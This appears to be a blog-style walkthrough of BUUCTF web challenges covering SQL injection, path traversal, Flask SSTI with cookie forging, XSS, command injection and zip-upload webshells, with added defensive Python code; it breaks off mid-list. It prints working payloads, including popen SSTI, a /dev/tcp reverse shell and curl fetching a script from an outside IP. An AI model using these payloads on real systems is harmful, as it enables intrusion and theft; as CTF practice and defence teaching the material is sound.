It has been a long time since I did any BUU challenges. =.=
[Chapter 1 Web Basics] SQL Injection-2
The login.php source says there is something at ?tips=1, so I just entered an arbitrary username and password, captured the request and got the parameter names, name and pass. Being lazy I went straight to sqlmap; there is also a good manual write-up by another author online: 一道題講懂SQL盲注 題目詳解
python sqlmap.py -u "http://d9928328-e53e-484b-82c4-ebb5dd9c9836.node3.buuoj.cn/login.php?tips=1" --data="name=1'&pass=password&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs
Lazy as that was, I did not expect it to run for more than twenty minutes.
[Chapter 1 Web Basics] afr_3
/proc/[pid]: when you want the current process you can use /proc/self instead
cmdline: the full command line that started the current process; for a zombie process this file is empty
cwd: a symbolic link to the process's current working directory
environ: the process's environment variables, separated from each other by NUL characters; variable names are in upper case and their values in lower case
Request ?name=../../../../../proc/self/cmdline to get the command currently running, which gives
python server.py
?name=../../../../../proc/self/cwd/server.py fetches the source
There is a flag.py and a key.py
flag.py should hold the flag, but it cannot be read
# Excerpt of server.py as read through /proc/self/cwd; the Flask import and the
# app object are added here so the route can run on its own.
from flask import Flask, redirect, render_template_string, request, session, url_for

app = Flask(__name__)


@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        # the filter strips . _ { } from the POSTed value, not from a value already in the session
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        '''
        SSTI is here
        '''
        template = '''<h1>N1 Page</h1>
        <div class="row">
            <div class="col-md-6 col-md-offset-3 center">
                Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>?
            </div>
        </div>
        ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)
So request name=../../../../../proc/self/cwd/key.py to get the app key
Forge the cookie with the SSTI payload to get the flag.
flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YF1mtQ.r6f0HB-dwcCcrhuZrMaOxG2-n-A
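As an added example (not the challenge's code and not from the write-up), here is the unchecked join that makes the ../../../../../proc/self/cwd/server.py read work, next to a lexical containment check that rejects it. The base directory /srv/app/articles and the function names are assumptions.

```python
import posixpath

# Constructed base directory for the demo; the challenge's real layout is not known.
ARTICLE_DIR = "/srv/app/articles"


def unsafe_article_path(name: str, base: str = ARTICLE_DIR) -> str:
    """Join and normalise with no check: the behaviour the write-up relies on.

    Five "../" components climb out of the three-deep base and land on /proc."""
    return posixpath.normpath(posixpath.join(base, name))


def resolve_article(name: str, base: str = ARTICLE_DIR):
    """Return the normalised path for a ?name= value, or None if it would leave base.

    Purely lexical (posixpath), so it runs without the files existing; a real
    deployment should also resolve symlinks with os.path.realpath before the check."""
    if not name or "\x00" in name:
        return None
    # posixpath.join discards base when name is absolute, so "/proc/self/cmdline"
    # ends up outside root and is rejected by the prefix test below.
    candidate = posixpath.normpath(posixpath.join(base, name))
    root = base.rstrip("/") + "/"
    # Comparing against the slash-terminated base rejects "/proc/..." as well as a
    # sibling directory such as "/srv/app/articles_old" that merely shares the prefix.
    if not candidate.startswith(root):
        return None
    return candidate
```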
[Chapter 2 Web Advanced] XSS Levels
level 1
level 2
username is escape-encoded, so construct
?username=';alert(1);//
so that username becomes:
var username = '';alert(1);//';
and alert(1) runs.
level 3
It filters out my single quote, so I write two
?username='';alert(1);//
level 4
Pseudo-protocol link
javascript:alert(1): the browser treats whatever follows javascript: as code and runs it directly in the current page.
The code takes jumpUrl as the redirect URL
/level4?jumpUrl=javascript:alert(1)
level 5
Restriction 1
if(getQueryVariable('autosubmit') !== false){
autosubmit=1
Restriction 2
autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
Again a parameter is passed in, only this time it carries our injected statement
Full payload
/level5?autosubmit=1&action=javascript:alert(1)
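An added example, not part of the original write-up, showing the server-side counterparts of the two bugs above: encoding username for a JavaScript string context (levels 2 and 3) and validating a jumpUrl/action value by scheme rather than by searching for a word (levels 4 and 5). Function names are my own.

```python
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def js_string_literal(value: str) -> str:
    """Encode a value for the inside of a <script> block as a JS string literal.

    json.dumps escapes quotes, backslashes, control characters and (with the
    default ensure_ascii) every non-ASCII character, U+2028/U+2029 included.
    The extra replacements cover what JSON leaves alone but the HTML parser
    would still act on, so '</script>' cannot close the block."""
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def render_username_script(username: str) -> str:
    """Safe counterpart of the page's  var username = '<raw>';  line."""
    return "var username = %s;" % js_string_literal(username)


def safe_jump_url(candidate, default: str = "/") -> str:
    """Return candidate only if it is a local absolute path or an http(s) URL, else default.

    Checking the parsed scheme, not looking for the text 'javascript', is what
    defeats javascript:alert(1) style jumpUrl/action values."""
    if not candidate:
        return default
    # browsers drop tabs/newlines and leading blanks before scheme detection; do the same
    value = "".join(c for c in candidate.strip() if c not in "\t\r\n")
    parts = urlsplit(value)          # urlsplit lower-cases the scheme for us
    if parts.scheme:
        return value if parts.scheme in ALLOWED_SCHEMES else default
    if value.startswith("/") and not value.startswith("//"):
        return value                 # same-site path such as /level4; "//host" is protocol-relative
    return default
```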
level 6
Check which template framework this environment uses: it is AngularJS
Reference:
Our Angular version is 1.4.6, which has a sandbox, so look up the sandbox escape for that version of Angular:
Copy it over as-is
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
Flag obtained.
[Chapter 2 Web Advanced] Deadly ping command
Preparation
First start this target machine from a second BUU account
Connect over ssh
Er, that is a challenge in itself...
Look up its IP
Solving
I recommend working directly in Burp here, because anything typed into the web page gets encoded.
It turns out a lot of illegal characters are filtered.
Use %0a instead of ;
That works.
The Docker container has no bash or python, and an sh reverse shell does not work either:
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
For now arbitrary commands can still be run in a roundabout way.
Write 1.sh
Fetch the bash script into the tmp directory
127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh    # fetch the script into the tmp directory
127.0.0.1%0acurl 117.21.200.166/1.sh > /tmp/1.sh
Make the script executable
127.0.0.1%0achmod 777 /tmp/1.sh
Listen on port 8089 on the 117.21.200.166 machine
Run 1.sh
The terminal shows the output; flag obtained
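Added example, not the challenge's code: the filter in this challenge is a denylist of characters that the %0a newline slips past. The validator below allowlists a literal IP address or a plain hostname and hands it to ping as an argv list rather than a shell string; unquote() stands in for the form decoding the server does, and the function names are assumptions.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote

# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, at most 63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"(?:%s\.)*%s" % (_LABEL, _LABEL))


def is_safe_ping_target(target) -> bool:
    """Allowlist check: a literal IPv4/IPv6 address or a plain hostname, nothing else.

    Anything a shell could interpret (; | & $ ` newline ...) fails because it is
    simply not in the allowed alphabet; no denylist has to enumerate it."""
    if not isinstance(target, str) or not 0 < len(target) <= 253:
        return False
    try:
        ipaddress.ip_address(target)      # raises ValueError on anything but an address
        return True
    except ValueError:
        pass
    # fullmatch anchors both ends, so "host\n<command>" cannot ride along the way it can with "$"
    return _HOSTNAME_RE.fullmatch(target) is not None


def build_ping_argv(raw_param: str):
    """Decode the form value the way the server would, validate it and build argv.

    Returns None for a rejected value. The list form of subprocess never goes
    through /bin/sh, so a newline or ';' could not split the command even if
    it slipped past validation."""
    target = unquote(raw_param)
    if not is_safe_ping_target(target):
        return None
    return ["ping", "-c", "1", target]


def run_ping(raw_param: str) -> str:
    argv = build_ping_argv(raw_param)
    if argv is None:
        raise ValueError("refusing ping target: %r" % unquote(raw_param))
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout
```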
[Chapter 2 Web Advanced] File Upload
This challenge is a bit of a trap
<?php
header("Content-Type:text/html; charset=utf-8");
// uploaded files in the directory are cleared every 5 minutes
require_once('pclzip.lib.php');
if(!$_FILES){
    echo '
    <!DOCTYPE html>
    <html lang="zh">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta http-equiv="X-UA-Compatible" content="ie=edge" />
        <title>文件上傳章節練習題</title>
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
        <style type="text/css">
            .login-box{ margin-top: 100px; height: 500px; border: 1px solid #000; }
            body{ background: white; }
            .btn1{ width: 200px; }
            .d1{ display: block; height: 400px; }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="login-box col-md-12">
                <form class="form-horizontal" method="post" enctype="multipart/form-data" >
                    <h1>文件上傳章節練習題</h1>
                    <hr />
                    <div class="form-group">
                        <label class="col-sm-2 control-label">選擇文件:</label>
                        <div class="input-group col-sm-10">
                            <div >
                                <label for="">
                                    <input type="file" name="file" />
                                </label>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-8 text-right">
                        <input type="submit" class="btn btn-success text-right btn1" />
                    </div>
                </form>
            </div>
        </div>
    </body>
    </html>
    ';
    show_source(__FILE__);
}else{
    $file = $_FILES['file'];
    if(!$file){
        exit("請勿上傳空文件");
    }
    $name = $file['name'];
    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;
    // walks the upload tree and deletes everything whose last extension is not jpg/gif/png
    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            }
        }
    }
    if(!is_dir($dir)){
        mkdir($dir);
    }
    $temp_dir = $dir.md5(time().rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }
    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            // only the final extension of each entry is tested, and the entry path is not checked
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                    exit("壓縮包內不允許含有php文件!");
                }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                exit("解壓失敗");
            }
            check_dir($dir);
            exit('上傳成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上傳成功!');
        }
    }else{
        exit('僅允許上傳zip、jpg、gif、png文件!');
    }
}
Reading the zip-handling code: after a zip is uploaded the server extracts it under the upload directory and then deletes any file there whose extension is not on the whitelist, so one approach is to have the archive's contents land outside the upload directory.
We noticed Apache is in use, which brings Apache's multi-extension parsing to mind: name the file xxxx.php.xxx; as long as the trailing xxx has no handler, Apache keeps looking leftwards, so the file ends up parsed as php.
First create the zip on Windows: write the one-liner into a file whose name is as long as the name you are going to change it to and drag it into the archive; it is best if the original filename has exactly the same length as the replacement, otherwise you are in for a bad time.
I edited it with 010 Editor,
Save, upload, visit, success
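Added example, not the challenge's code: the PHP above only tests preg_match('/\.php$/') against the last extension and never looks at ".." in the entry path, which is exactly the combination the renamed zip entry relies on. The inspector below checks both before anything is extracted; the sample archive is constructed in memory and the function names are my own.

```python
import io
import zipfile

ALLOWED_EXT = {"jpg", "gif", "png"}
PHP_LIKE = ("phtml", "phar", "phps")


def entry_problems(name: str) -> list:
    """List everything wrong with one archive entry name; an empty list means acceptable."""
    problems = []
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        problems.append("absolute path")
    parts = norm.split("/")
    if ".." in parts:
        problems.append("parent-directory traversal")
    leaf = parts[-1]
    if not leaf:                     # directory entry, nothing more to check
        return problems
    exts = leaf.lower().split(".")[1:]
    # Look at every extension component, not only the final one: Apache's
    # multi-extension handling (the trick the write-up uses) can still run
    # "shell.php.xxx" as PHP although preg_match('/\.php$/') never fires.
    if any(e.startswith("php") or e in PHP_LIKE for e in exts):
        problems.append("php extension component")
    if not exts or exts[-1] not in ALLOWED_EXT:
        problems.append("extension not allowed")
    return problems


def inspect_archive(data: bytes) -> dict:
    """Map every entry name in the zip to its list of problems, before extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: entry_problems(info.filename) for info in zf.infolist()}


def is_safe_archive(data: bytes) -> bool:
    return all(not p for p in inspect_archive(data).values())


def build_sample_zip(include_bad: bool = True) -> bytes:
    """Constructed test archive; the 'bad' entry imitates the write-up's renamed entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("cat.jpg", b"\xff\xd8\xff placeholder image bytes")
        if include_bad:
            zf.writestr("../shell.php.xxx", b"placeholder, not a real script")
            zf.writestr("a/../b.png", b"placeholder")
    return buf.getvalue()
```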
[Chapter 3 Web Advanced] SSTI
On opening it, the page just says password is wrong; the challenge title says template injection, so try the password parameter,
and it is Flask template injection.
The following expression returns the list of usable classes
?password={{"".__class__.__bases__[0].__subclasses__()}}
Write a script to find the index of the entry whose name contains os
s = [
    "<class 'type'>", "<class 'weakref'>", "<class 'weakcallableproxy'>", "<class 'weakproxy'>", "<class 'int'>", "<class 'bytearray'>", "<class 'bytes'>", "<class 'list'>", "<class 'NoneType'>", "<class 'NotImplementedType'>", "<class 'traceback'>", "<class 'super'>", "<class 'range'>", "<class 'dict'>", "<class 'dict_keys'>", "<class 'dict_values'>", "<class 'dict_items'>", "<class 'odict_iterator'>", "<class 'set'>", "<class 'str'>", "<class 'slice'>", "<class 'staticmethod'>", "<class 'complex'>", "<class 'float'>", "<class 'frozenset'>", "<class 'property'>", "<class 'managedbuffer'>", "<class 'memoryview'>", "<class 'tuple'>", "<class 'enumerate'>", "<class 'reversed'>", "<class 'stderrprinter'>", "<class 'code'>", "<class 'frame'>", "<class 'builtin_function_or_method'>", "<class 'method'>", "<class 'function'>", "<class 'mappingproxy'>", "<class 'generator'>", "<class 'getset_descriptor'>", "<class 'wrapper_descriptor'>", "<class 'method-wrapper'>", "<class 'ellipsis'>", "<class 'member_descriptor'>", "<class 'types.SimpleNamespace'>", "<class 'PyCapsule'>", "<class 'longrange_iterator'>", "<class 'cell'>", "<class 'instancemethod'>", "<class 'classmethod_descriptor'>", "<class 'method_descriptor'>", "<class 'callable_iterator'>", "<class 'iterator'>", "<class 'coroutine'>", "<class 'coroutine_wrapper'>", "<class 'moduledef'>", "<class 'module'>", "<class 'EncodingMap'>", "<class 'fieldnameiterator'>", "<class 'formatteriterator'>", "<class 'filter'>", "<class 'map'>", "<class 'zip'>", "<class 'BaseException'>", "<class 'hamt'>", "<class 'hamt_array_node'>", "<class 'hamt_bitmap_node'>", "<class 'hamt_collision_node'>", "<class 'keys'>", "<class 'values'>", "<class 'items'>", "<class 'Context'>", "<class 'ContextVar'>", "<class 'Token'>", "<class 'Token.MISSING'>", "<class '_frozen_importlib._ModuleLock'>", "<class '_frozen_importlib._DummyModuleLock'>", "<class '_frozen_importlib._ModuleLockManager'>", "<class '_frozen_importlib._installed_safely'>",
    "<class '_frozen_importlib.ModuleSpec'>", "<class '_frozen_importlib.BuiltinImporter'>", "<class 'classmethod'>", "<class '_frozen_importlib.FrozenImporter'>", "<class '_frozen_importlib._ImportLockContext'>", "<class '_thread._localdummy'>", "<class '_thread._local'>", "<class '_thread.lock'>", "<class '_thread.RLock'>", "<class 'zipimport.zipimporter'>", "<class '_frozen_importlib_external.WindowsRegistryFinder'>", "<class '_frozen_importlib_external._LoaderBasics'>", "<class '_frozen_importlib_external.FileLoader'>", "<class '_frozen_importlib_external._NamespacePath'>", "<class '_frozen_importlib_external._NamespaceLoader'>", "<class '_frozen_importlib_external.PathFinder'>", "<class '_frozen_importlib_external.FileFinder'>", "<class '_io._IOBase'>", "<class '_io._BytesIOBuffer'>", "<class '_io.IncrementalNewlineDecoder'>", "<class 'posix.ScandirIterator'>", "<class 'posix.DirEntry'>", "<class 'codecs.Codec'>", "<class 'codecs.IncrementalEncoder'>", "<class 'codecs.IncrementalDecoder'>", "<class 'codecs.StreamReaderWriter'>", "<class 'codecs.StreamRecoder'>", "<class '_abc_data'>", "<class 'abc.ABC'>", "<class 'dict_itemiterator'>", "<class 'collections.abc.Hashable'>", "<class 'collections.abc.Awaitable'>", "<class 'collections.abc.AsyncIterable'>", "<class 'async_generator'>", "<class 'collections.abc.Iterable'>", "<class 'bytes_iterator'>", "<class 'bytearray_iterator'>", "<class 'dict_keyiterator'>", "<class 'dict_valueiterator'>", "<class 'list_iterator'>", "<class 'list_reverseiterator'>", "<class 'range_iterator'>", "<class 'set_iterator'>", "<class 'str_iterator'>", "<class 'tuple_iterator'>", "<class 'collections.abc.Sized'>", "<class 'collections.abc.Container'>", "<class 'collections.abc.Callable'>", "<class 'os._wrap_close'>", "<class '_sitebuiltins.Quitter'>", "<class '_sitebuiltins._Printer'>", "<class '_sitebuiltins._Helper'>", "<class 'types.DynamicClassAttribute'>", "<class 'types._GeneratorWrapper'>", "<class 'collections.deque'>",
    "<class '_collections._deque_iterator'>", "<class '_collections._deque_reverse_iterator'>", "<class 'enum.auto'>", "<enum 'Enum'>", "<class 're.Pattern'>", "<class 're.Match'>", "<class '_sre.SRE_Scanner'>", "<class 'sre_parse.Pattern'>", "<class 'sre_parse.SubPattern'>", "<class 'sre_parse.Tokenizer'>", "<class 'functools.partial'>", "<class 'functools._lru_cache_wrapper'>", "<class 'operator.itemgetter'>", "<class 'operator.attrgetter'>", "<class 'operator.methodcaller'>", "<class 'itertools.accumulate'>", "<class 'itertools.combinations'>", "<class 'itertools.combinations_with_replacement'>", "<class 'itertools.cycle'>", "<class 'itertools.dropwhile'>", "<class 'itertools.takewhile'>", "<class 'itertools.islice'>", "<class 'itertools.starmap'>", "<class 'itertools.chain'>", "<class 'itertools.compress'>", "<class 'itertools.filterfalse'>", "<class 'itertools.count'>", "<class 'itertools.zip_longest'>", "<class 'itertools.permutations'>", "<class 'itertools.product'>", "<class 'itertools.repeat'>", "<class 'itertools.groupby'>", "<class 'itertools._grouper'>", "<class 'itertools._tee'>", "<class 'itertools._tee_dataobject'>", "<class 'reprlib.Repr'>", "<class 'collections._Link'>", "<class 'functools.partialmethod'>", "<class 're.Scanner'>", "<class 'string.Template'>", "<class 'string.Formatter'>", "<class 'markupsafe._MarkupEscapeHelper'>", "<class 'warnings.WarningMessage'>", "<class 'warnings.catch_warnings'>", "<class 'zlib.Compress'>", "<class 'zlib.Decompress'>", "<class 'tokenize.Untokenizer'>", "<class 'traceback.FrameSummary'>", "<class 'traceback.TracebackException'>", "<class '_weakrefset._IterationGuard'>", "<class '_weakrefset.WeakSet'>", "<class 'threading._RLock'>", "<class 'threading.Condition'>", "<class 'threading.Semaphore'>", "<class 'threading.Event'>", "<class 'threading.Barrier'>", "<class 'threading.Thread'>", "<class '_bz2.BZ2Compressor'>", "<class '_bz2.BZ2Decompressor'>", "<class '_lzma.LZMACompressor'>", "<class '_lzma.LZMADecompressor'>",
    "<class '_hashlib.HASH'>", "<class '_blake2.blake2b'>", "<class '_blake2.blake2s'>", "<class '_sha3.sha3_224'>", "<class '_sha3.sha3_256'>", "<class '_sha3.sha3_384'>", "<class '_sha3.sha3_512'>", "<class '_sha3.shake_128'>", "<class '_sha3.shake_256'>", "<class '_random.Random'>", "<class 'weakref.finalize._Info'>", "<class 'weakref.finalize'>", "<class 'tempfile._RandomNameSequence'>", "<class 'tempfile._TemporaryFileCloser'>", "<class 'tempfile._TemporaryFileWrapper'>", "<class 'tempfile.SpooledTemporaryFile'>", "<class 'tempfile.TemporaryDirectory'>", "<class 'Struct'>", "<class 'unpack_iterator'>", "<class 'pickle._Framer'>", "<class 'pickle._Unframer'>", "<class 'pickle._Pickler'>", "<class 'pickle._Unpickler'>", "<class '_pickle.Unpickler'>", "<class '_pickle.Pickler'>", "<class '_pickle.Pdata'>", "<class '_pickle.PicklerMemoProxy'>", "<class '_pickle.UnpicklerMemoProxy'>", "<class 'urllib.parse._ResultMixinStr'>", "<class 'urllib.parse._ResultMixinBytes'>", "<class 'urllib.parse._NetlocResultMixinBase'>", "<class '_json.Scanner'>", "<class '_json.Encoder'>", "<class 'json.decoder.JSONDecoder'>", "<class 'json.encoder.JSONEncoder'>", "<class 'jinja2.utils.MissingType'>", "<class 'jinja2.utils.LRUCache'>", "<class 'jinja2.utils.Cycler'>", "<class 'jinja2.utils.Joiner'>", "<class 'jinja2.utils.Namespace'>", "<class 'jinja2.bccache.Bucket'>", "<class 'jinja2.bccache.BytecodeCache'>", "<class 'jinja2.nodes.EvalContext'>", "<class 'jinja2.nodes.Node'>", "<class 'jinja2.visitor.NodeVisitor'>", "<class 'jinja2.idtracking.Symbols'>", "<class '__future__._Feature'>", "<class 'jinja2.compiler.MacroRef'>", "<class 'jinja2.compiler.Frame'>", "<class 'jinja2.runtime.TemplateReference'>", "<class 'jinja2.runtime.Context'>", "<class 'jinja2.runtime.BlockReference'>", "<class 'jinja2.runtime.LoopContext'>", "<class 'jinja2.runtime.Macro'>", "<class 'jinja2.runtime.Undefined'>", "<class 'decimal.Decimal'>", "<class 'decimal.Context'>", "<class 'decimal.SignalDictMixin'>",
    "<class 'decimal.ContextManager'>", "<class 'numbers.Number'>", "<class '_ast.AST'>", "<class 'ast.NodeVisitor'>", "<class 'jinja2.lexer.Failure'>", "<class 'jinja2.lexer.TokenStreamIterator'>", "<class 'jinja2.lexer.TokenStream'>", "<class 'jinja2.lexer.Lexer'>", "<class 'jinja2.parser.Parser'>", "<class 'jinja2.environment.Environment'>", "<class 'jinja2.environment.Template'>", "<class 'jinja2.environment.TemplateModule'>", "<class 'jinja2.environment.TemplateExpression'>", "<class 'jinja2.environment.TemplateStream'>", "<class 'jinja2.loaders.BaseLoader'>", "<class 'select.poll'>", "<class 'select.epoll'>", "<class 'selectors.BaseSelector'>", "<class '_socket.socket'>", "<class 'datetime.date'>", "<class 'datetime.timedelta'>", "<class 'datetime.time'>", "<class 'datetime.tzinfo'>", "<class 'dis.Bytecode'>", "<class 'inspect.BlockFinder'>", "<class 'inspect._void'>", "<class 'inspect._empty'>", "<class 'inspect.Parameter'>", "<class 'inspect.BoundArguments'>", "<class 'inspect.Signature'>", "<class 'logging.LogRecord'>", "<class 'logging.PercentStyle'>", "<class 'logging.Formatter'>", "<class 'logging.BufferingFormatter'>", "<class 'logging.Filter'>", "<class 'logging.Filterer'>", "<class 'logging.PlaceHolder'>", "<class 'logging.Manager'>", "<class 'logging.LoggerAdapter'>", "<class 'werkzeug._internal._Missing'>", "<class 'werkzeug._internal._DictAccessorProperty'>", "<class 'importlib.abc.Finder'>", "<class 'importlib.abc.Loader'>", "<class 'importlib.abc.ResourceReader'>", "<class 'contextlib.ContextDecorator'>", "<class 'contextlib._GeneratorContextManagerBase'>", "<class 'contextlib._BaseExitStack'>", "<class 'pkgutil.ImpImporter'>", "<class 'pkgutil.ImpLoader'>", "<class 'werkzeug.utils.HTMLBuilder'>", "<class 'werkzeug.exceptions.Aborter'>", "<class 'werkzeug.urls.Href'>", "<class 'socketserver.BaseServer'>", "<class 'socketserver.ForkingMixIn'>", "<class 'socketserver.ThreadingMixIn'>", "<class 'socketserver.BaseRequestHandler'>",
    "<class 'calendar._localized_month'>", "<class 'calendar._localized_day'>", "<class 'calendar.Calendar'>", "<class 'calendar.different_locale'>", "<class 'email._parseaddr.AddrlistClass'>", "<class 'email.charset.Charset'>", "<class 'email.header.Header'>", "<class 'email.header._ValueFormatter'>", "<class 'email._policybase._PolicyBase'>", "<class 'email.feedparser.BufferedSubFile'>", "<class 'email.feedparser.FeedParser'>", "<class 'email.parser.Parser'>", "<class 'email.parser.BytesParser'>", "<class 'email.message.Message'>", "<class 'http.client.HTTPConnection'>", "<class '_ssl._SSLContext'>", "<class '_ssl._SSLSocket'>", "<class '_ssl.MemoryBIO'>", "<class '_ssl.Session'>", "<class 'ssl.SSLObject'>", "<class 'mimetypes.MimeTypes'>", "<class 'click._compat._FixupStream'>", "<class 'click._compat._AtomicFile'>", "<class 'click.utils.LazyFile'>", "<class 'click.utils.KeepOpenFile'>", "<class 'click.utils.PacifyFlushWrapper'>", "<class 'click.parser.Option'>", "<class 'click.parser.Argument'>", "<class 'click.parser.ParsingState'>", "<class 'click.parser.OptionParser'>", "<class 'click.types.ParamType'>", "<class 'click.formatting.HelpFormatter'>", "<class 'click.core.Context'>", "<class 'click.core.BaseCommand'>", "<class 'click.core.Parameter'>", "<class 'werkzeug.serving.WSGIRequestHandler'>", "<class 'werkzeug.serving._SSLContext'>", "<class 'werkzeug.serving.BaseWSGIServer'>", "<class 'werkzeug.datastructures.ImmutableListMixin'>", "<class 'werkzeug.datastructures.ImmutableDictMixin'>", "<class 'werkzeug.datastructures.UpdateDictMixin'>", "<class 'werkzeug.datastructures.ViewItems'>", "<class 'werkzeug.datastructures._omd_bucket'>", "<class 'werkzeug.datastructures.Headers'>", "<class 'werkzeug.datastructures.ImmutableHeadersMixin'>", "<class 'werkzeug.datastructures.IfRange'>", "<class 'werkzeug.datastructures.Range'>", "<class 'werkzeug.datastructures.ContentRange'>", "<class 'werkzeug.datastructures.FileStorage'>", "<class 'urllib.request.Request'>",
    "<class 'urllib.request.OpenerDirector'>", "<class 'urllib.request.BaseHandler'>", "<class 'urllib.request.HTTPPasswordMgr'>", "<class 'urllib.request.AbstractBasicAuthHandler'>", "<class 'urllib.request.AbstractDigestAuthHandler'>", "<class 'urllib.request.URLopener'>", "<class 'urllib.request.ftpwrapper'>", "<class 'werkzeug.wrappers.accept.AcceptMixin'>", "<class 'werkzeug.wrappers.auth.AuthorizationMixin'>", "<class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>", "<class 'werkzeug.wsgi.ClosingIterator'>", "<class 'werkzeug.wsgi.FileWrapper'>", "<class 'werkzeug.wsgi._RangeWrapper'>", "<class 'werkzeug.formparser.FormDataParser'>", "<class 'werkzeug.formparser.MultiPartParser'>", "<class 'werkzeug.wrappers.base_request.BaseRequest'>", "<class 'werkzeug.wrappers.base_response.BaseResponse'>", "<class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>", "<class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>", "<class 'werkzeug.wrappers.etag.ETagRequestMixin'>", "<class 'werkzeug.wrappers.etag.ETagResponseMixin'>", "<class 'werkzeug.wrappers.cors.CORSRequestMixin'>", "<class 'werkzeug.wrappers.cors.CORSResponseMixin'>", "<class 'werkzeug.useragents.UserAgentParser'>", "<class 'werkzeug.useragents.UserAgent'>", "<class 'werkzeug.wrappers.user_agent.UserAgentMixin'>", "<class 'werkzeug.wrappers.request.StreamOnlyMixin'>", "<class 'werkzeug.wrappers.response.ResponseStream'>", "<class 'werkzeug.wrappers.response.ResponseStreamMixin'>", "<class 'http.cookiejar.Cookie'>", "<class 'http.cookiejar.CookiePolicy'>", "<class 'http.cookiejar.Absent'>", "<class 'http.cookiejar.CookieJar'>", "<class 'werkzeug.test._TestCookieHeaders'>", "<class 'werkzeug.test._TestCookieResponse'>", "<class 'werkzeug.test.EnvironBuilder'>", "<class 'werkzeug.test.Client'>", "<class 'uuid.UUID'>", "<class 'itsdangerous._json._CompactJSON'>", "<class 'hmac.HMAC'>", "<class 'itsdangerous.signer.SigningAlgorithm'>", "<class 'itsdangerous.signer.Signer'>",
    "<class 'itsdangerous.serializer.Serializer'>", "<class 'itsdangerous.url_safe.URLSafeSerializerMixin'>", "<class 'flask._compat._DeprecatedBool'>", "<class 'werkzeug.local.Local'>", "<class 'werkzeug.local.LocalStack'>", "<class 'werkzeug.local.LocalManager'>", "<class 'werkzeug.local.LocalProxy'>", "<class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>", "<class 'dataclasses._MISSING_TYPE'>", "<class 'dataclasses._FIELD_BASE'>", "<class 'dataclasses.InitVar'>", "<class 'dataclasses.Field'>", "<class 'dataclasses._DataclassParams'>", "<class 'difflib.SequenceMatcher'>", "<class 'difflib.Differ'>", "<class 'difflib.HtmlDiff'>", "<class 'pprint._safe_key'>", "<class 'pprint.PrettyPrinter'>", "<class 'werkzeug.routing.RuleFactory'>", "<class 'werkzeug.routing.RuleTemplate'>", "<class 'werkzeug.routing.BaseConverter'>", "<class 'werkzeug.routing.Map'>", "<class 'werkzeug.routing.MapAdapter'>", "<class 'subprocess.CompletedProcess'>", "<class 'subprocess.Popen'>", "<class 'flask.signals.Namespace'>", "<class 'flask.signals._FakeSignal'>", "<class 'flask.helpers.locked_cached_property'>", "<class 'flask.helpers._PackageBoundObject'>", "<class 'flask.cli.DispatchingApp'>", "<class 'flask.cli.ScriptInfo'>", "<class 'flask.config.ConfigAttribute'>", "<class 'flask.ctx._AppCtxGlobals'>", "<class 